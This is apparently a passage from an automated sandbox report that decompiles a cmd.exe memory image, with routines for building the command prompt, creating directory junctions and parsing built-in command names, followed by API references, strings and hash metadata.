												__eax = E001C274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E001B443C(__ecx) =  &_v124;
												__esi = E001BB3FC(__ecx, 0x2350,  &_v124);
												E001C274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0x1b3948;
												if(_v672 == 0) {
													__eax = 0x1b3958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E001C1040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E001C1040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0x1f3cc9 == 0) {
													goto L85;
												}
												__ecx =  *0x1f3ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0x1f3cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0x1f3cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0x1f3ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0x1f3ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E001C7797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0x1fc028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E001C274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E001C274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
													goto L83;
												}
										}
									}
									_t41 = _t125 + 0x1b3b94; // 0x450000
									E001C274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E001C274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E001B68B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E001D7AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}

0x001d6ff3
0x001d6ff5
0x001d6ff6
0x001d6ffa
0x001d7001
0x001d7005
0x001d7007
0x001d7009
0x001d700e
0x001d7019
0x001d701a
0x001d701b
0x001d701c
0x001d701d
0x001d7023
0x001d7028
0x001d702b
0x001d702d
0x001d7032
0x001d7033
0x001d7036
0x001d703c
0x001d7041
0x001d7047
0x001d704d
0x001d704f
0x001d7050
0x001d7055
0x001d7062
0x001d7068
0x001d7074
0x001d7074
0x001d707a
0x001d7080
0x001d7678
0x001d767b
0x001d7683
0x001d7684
0x001d7695
0x001d7086
0x001d7086
0x001d708c
0x001d7093
0x001d7098
0x001d70a0
0x001d70b9
0x001d70bb
0x001d70c3
0x001d70d0
0x001d70d8
0x001d70dd
0x001d70dd
0x001d70a2
0x001d70a7
0x001d70a7
0x001d70e4
0x001d70ec
0x001d70ee
0x001d70ee
0x001d70f4
0x001d70fa
0x001d7105
0x001d710a
0x001d7112
0x00000000
0x001d7118
0x001d7118
0x001d711a
0x001d7122
0x001d712b
0x001d712c
0x001d7132
0x001d713a
0x001d75eb
0x001d75eb
0x001d75f2
0x001d75f4
0x001d75f4
0x001d7600
0x001d7607
0x001d760f
0x001d7611
0x001d7611
0x001d7616
0x001d7616
0x001d7619
0x001d761c
0x001d7625
0x001d7628
0x001d7628
0x001d762a
0x001d762c
0x001d762f
0x001d7635
0x001d7637
0x001d7637
0x001d763a
0x001d763a
0x001d763d
0x001d7640
0x001d7647
0x001d764b
0x001d7657
0x001d765f
0x001d7665
0x001d7672
0x001d7672
0x00000000
0x001d7657
0x001d7140
0x001d7146
0x00000000
0x00000000
0x00000000
0x001d714c
0x001d7159
0x001d71ed
0x001d71f0
0x001d71f6
0x001d71fe
0x001d7200
0x001d720a
0x001d7220
0x001d7224
0x001d7224
0x001d722a
0x001d7230
0x001d7235
0x00000000
0x00000000
0x001d723b
0x001d723b
0x001d7245
0x001d724b
0x001d7251
0x00000000
0x00000000
0x001d7257
0x001d7257
0x001d7261
0x001d729d
0x001d729d
0x001d72a3
0x001d7582
0x001d7582
0x001d7589
0x001d758b
0x001d758b
0x001d759b
0x001d75a0
0x001d75a3
0x001d75a8
0x001d75b0
0x001d75b0
0x001d75b3
0x001d75b6
0x001d75bb
0x001d75c1
0x001d75c1
0x001d75c3
0x001d75c5
0x001d75c8
0x001d75c8
0x001d75ce
0x001d75d4
0x001d75da
0x001d75dd
0x001d75e3
0x00000000
0x001d75e3
0x001d72a9
0x00000000
0x001d72b7
0x00000000
0x00000000
0x001d72c8
0x001d72ca
0x001d72cb
0x001d72cd
0x001d72bc
0x001d72bc
0x001d72bf
0x00000000
0x00000000
0x001d72d4
0x001d72db
0x001d72dd
0x001d72dd
0x001d72ea
0x001d72f2
0x001d72f4
0x001d72f7
0x001d72fd
0x001d72ff
0x001d72ff
0x001d7302
0x001d7305
0x001d730a
0x00000000
0x00000000
0x001d7315
0x001d731d
0x001d732b
0x001d7343
0x001d7349
0x001d734b
0x001d734e
0x001d7350
0x001d7350
0x001d7353
0x001d7356
0x001d735b
0x001d735d
0x00000000
0x00000000
0x001d7370
0x001d7375
0x001d7377
0x001d7377
0x001d737d
0x001d737f
0x001d7381
0x001d7386
0x001d7388
0x001d738b
0x001d7391
0x001d7393
0x001d7393
0x001d7396
0x001d7399
0x001d739e
0x00000000
0x00000000
0x001d73ae
0x001d73b0
0x001d73b2
0x001d73b7
0x001d73b9
0x001d73bc
0x001d73c2
0x001d73c4
0x001d73c4
0x001d73c7
0x001d73ca
0x001d73cf
0x00000000
0x00000000
0x00000000
0x00000000
0x001d73e1
0x00000000
0x00000000
0x001d73e7
0x001d7410
0x001d73ef
0x001d73f1
0x001d73f4
0x00000000
0x00000000
0x001d73fa
0x001d73fc
0x001d73fd
0x001d7400
0x001d7403
0x001d7409
0x001d740a
0x001d740a
0x00000000
0x00000000
0x001d7421
0x00000000
0x00000000
0x001d7427
0x001d742d
0x001d7435
0x001d7437
0x001d7439
0x001d7439
0x001d743e
0x001d7441
0x001d7447
0x001d7449
0x001d7449
0x001d744e
0x001d7452
0x001d7456
0x001d7458
0x001d7459
0x001d745d
0x001d745f
0x001d7463
0x001d7470
0x00000000
0x001d7476
0x001d7476
0x001d7478
0x001d747c
0x001d7486
0x001d7489
0x001d7490
0x001d74b2
0x001d7492
0x001d7492
0x001d7498
0x001d7499
0x001d749f
0x001d74a0
0x001d74a3
0x001d74a4
0x001d74aa
0x001d74aa
0x001d74bc
0x001d750b
0x001d755a
0x001d7562
0x001d7564
0x001d7567
0x001d756d
0x001d756f
0x001d756f
0x001d7572
0x001d7575
0x001d757a
0x001d750d
0x001d7517
0x00000000
0x00000000
0x001d751d
0x001d7522
0x001d7523
0x001d7524
0x001d7529
0x001d752c
0x001d752e
0x001d7531
0x001d7537
0x001d7539
0x001d7539
0x001d753c
0x001d753f
0x001d7544
0x001d7544
0x00000000
0x001d750b
0x00000000
0x001d72a9
0x001d7263
0x001d7272
0x001d7277
0x001d727a
0x001d727f
0x001d7287
0x001d7287
0x001d728a
0x001d728d
0x001d7292
0x00000000
0x001d7292
0x001d7239
0x00000000
0x001d7239
0x001d716a
0x001d716f
0x001d7172
0x001d7174
0x001d7177
0x001d717d
0x001d717f
0x001d717f
0x001d7182
0x001d7185
0x001d7190
0x001d7192
0x001d7195
0x001d719b
0x001d719d
0x001d71aa
0x001d71dc
0x001d71dc
0x00000000
0x001d71dc
0x001d71b5
0x001d71c4
0x001d71da
0x00000000
0x001d71da
0x001d71cf
0x00000000
0x001d71cf
0x00000000
0x001d714c
0x001d7112

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(EA614D48,?,00000000), ref: 001D7062
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D7074

Part of subcall function 001BCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001DF830,00002000,?,?,?,?,?,001C373A,001B590A,00000000), ref: 001BCFDF

towupper.MSVCRT ref: 001D720E
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001D7343
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,001B1EB4,001B3958), ref: 001D7467
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,EA614D48,?,00000000), ref: 001D765F
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D7672

Strings

%s , xrefs: 001D7553
%s>, xrefs: 001D75FA
Unknown, xrefs: 001D751D
PROMPT, xrefs: 001D70AF

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
String ID: %s $%s>$PROMPT$Unknown
API String ID: 708651206-3050974680
Opcode ID: f6e173b036fe36d9a98edcf8346de28776be174380d38d843417508678e02f84
Instruction ID: 3e44968883cb73e94c706c2e9593838f4ad20491425a7b01cb6d88afea8e5c36
Opcode Fuzzy Hash: f6e173b036fe36d9a98edcf8346de28776be174380d38d843417508678e02f84
Instruction Fuzzy Hash: 7A02E375A052159BCB24DF28DC49ABAB7B5EB54300F14829BE809E7794EB309E81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001DB5E0 Relevance: 19.7, APIs: 13, Instructions: 180
filememorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001DB5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E001DB51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E001DB51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E001DB9D3(_t91, 0, 1) != 0) {
						if(E001DB91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E001C00B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						SetLastError(0x40002749);
						L4:
						goto L19;
					}
					SetLastError(0x4000272e);
					goto L4;
				}
			}

0x001db5ea
0x001db5f1
0x001db5f4
0x001db5f5
0x001db5fb
0x001db5fe
0x001db609
0x001db610
0x001db614
0x001db7a2
0x001db7a6
0x001db7b7
0x001db7b7
0x001db7bf
0x001db7c8
0x001db7c8
0x001db7d6
0x001db622
0x001db62e
0x001db649
0x001db65e
0x00000000
0x00000000
0x001db666
0x001db679
0x001db67f
0x001db685
0x00000000
0x00000000
0x001db694
0x001db69a
0x001db69c
0x001db69c
0x001db69f
0x001db69f
0x001db6a2
0x001db6a5
0x001db6bb
0x001db6be
0x001db6c3
0x001db6c8
0x001db798
0x001db79b
0x001db79c
0x00000000
0x001db79c
0x001db6d5
0x001db6da
0x001db6e6
0x001db6ef
0x001db6f5
0x001db6fd
0x001db70a
0x001db70f
0x001db715
0x001db71e
0x001db721
0x001db723
0x001db727
0x001db72a
0x001db72d
0x001db72d
0x001db730
0x001db733
0x001db73e
0x001db741
0x001db756
0x001db75e
0x001db778
0x001db780
0x001db794
0x001db782
0x001db78a
0x001db78a
0x00000000
0x001db780
0x001db635
0x001db635
0x00000000
0x001db635
0x001db635
0x00000000
0x001db635

APIs

Part of subcall function 001DB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 001DB533
Part of subcall function 001DB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 001DB54F

Part of subcall function 001DB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 001DB560

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 001DB635
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 001DB656
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 001DB679
RtlDosPathNameToNtPathName_U.NTDLL ref: 001DB694
memset.MSVCRT ref: 001DB6D5
memcpy.MSVCRT ref: 001DB70A
memcpy.MSVCRT ref: 001DB756
NtFsControlFile.NTDLL ref: 001DB778
RtlNtStatusToDosError.NTDLL ref: 001DB783
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001DB78A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001DB79C
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 001DB7B7
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001DB7C8

Part of subcall function 001DB9D3: memset.MSVCRT ref: 001DBA0F
Part of subcall function 001DB9D3: memset.MSVCRT ref: 001DBA37
Part of subcall function 001DB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001DBAA8
Part of subcall function 001DB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001DBAC7
Part of subcall function 001DB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001DBB0B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
String ID:
API String ID: 223857506-0
Opcode ID: 14210d38384622dfd14fecd739d38f54d60145ee0f4d3b395cd76ba6de60e244
Instruction ID: 76d73147ac9f4b79949050c67db0e5b77d53bb66864591c5d8d4712203a2b5c2
Opcode Fuzzy Hash: 14210d38384622dfd14fecd739d38f54d60145ee0f4d3b395cd76ba6de60e244
Instruction Fuzzy Hash: F7518A71904215EBDB14AFB5CC89ABEB7B8EF88304F15416AF806E6390EB35DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 001BE040 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E001BE040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E001C0C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x1f3cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E001C6FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x1b1628;
						do {
							_t24 = _t150 - 8; // 0x1b35b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x1f3cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x1dd0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E001BDFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E001BD7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E001C00B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E001D9287(_t136);
													__imp__longjmp(0x1eb8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E001C1040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E001C18C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x1b1a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}

0x001be040
0x001be04b
0x001be052
0x001be063
0x001be069
0x001be06b
0x001be075
0x001be07b
0x001be07e
0x001be085
0x001be089
0x001be090
0x001be095
0x001be09c
0x001cbd1d
0x001be0a2
0x001be0a2
0x001be0a2
0x001be0a8
0x001be0b5
0x001cbd27
0x00000000
0x001be0bb
0x001be0bb
0x001be0c0
0x001be0cb
0x001be0cf
0x001be0d4
0x001be212
0x001be21a
0x001be21d
0x001be225
0x001be310
0x001be22b
0x001be22b
0x001be22b
0x001be0e5
0x001be0e7
0x001be100
0x001be103
0x001be11c
0x001be11c
0x001be121
0x001cbd31
0x001cbd31
0x001be127
0x001be12b
0x001be12c
0x00000000
0x001be12c
0x001be10b
0x001be111
0x001be116
0x001be2d8
0x00000000
0x00000000
0x001be2de
0x001be2de
0x00000000
0x001be0ed
0x001be0f3
0x001be0f9
0x001be0fe
0x00000000
0x00000000
0x00000000
0x001be0fe
0x001be0e7
0x001be0dd
0x00000000
0x00000000
0x001be0df
0x00000000
0x001be0df
0x001be134
0x001be13c
0x001cbd3c
0x001be1ea
0x001be1ed
0x001be208
0x001be208
0x001be142
0x001be147
0x001cbd44
0x001cbd44
0x001be14f
0x001be156
0x001be2e5
0x001be2ea
0x001be328
0x001be328
0x001be2ed
0x001be2f6
0x001be320
0x00000000
0x00000000
0x00000000
0x001be2f8
0x001be2f8
0x001be2f8
0x001be2fb
0x001be303
0x001be330
0x001be330
0x001be307
0x00000000
0x001be307
0x001be15c
0x001be15c
0x001be15c
0x001be161
0x001cbd4f
0x001cbd4f
0x001be167
0x001be169
0x001be170
0x001be170
0x001be170
0x001be175
0x00000000
0x00000000
0x001be179
0x001be17f
0x001be184
0x001be19d
0x001be1a2
0x001cbd61
0x00000000
0x00000000
0x00000000
0x001cbd67
0x001be1a8
0x001be1a8
0x001be1ae
0x001be1b1
0x001be1b1
0x001be1ba
0x001be237
0x001cbd6c
0x001cbd6c
0x001be23e
0x001be24b
0x001cbd77
0x001be251
0x001be251
0x001be258
0x001be260
0x001be269
0x001be270
0x00000000
0x00000000
0x001be272
0x001be277
0x001be2b8
0x001be2c0
0x001be2c3
0x001be2cb
0x001be317
0x001be2cd
0x001be2cd
0x001be2cd
0x001be279
0x001be279
0x001be279
0x001be281
0x001be288
0x00000000
0x00000000
0x001be28b
0x001be291
0x001be296
0x00000000
0x00000000
0x001be29a
0x001be2a6
0x00000000
0x00000000
0x00000000
0x00000000
0x001be283
0x001be283
0x001be283
0x00000000
0x001be283
0x001be281
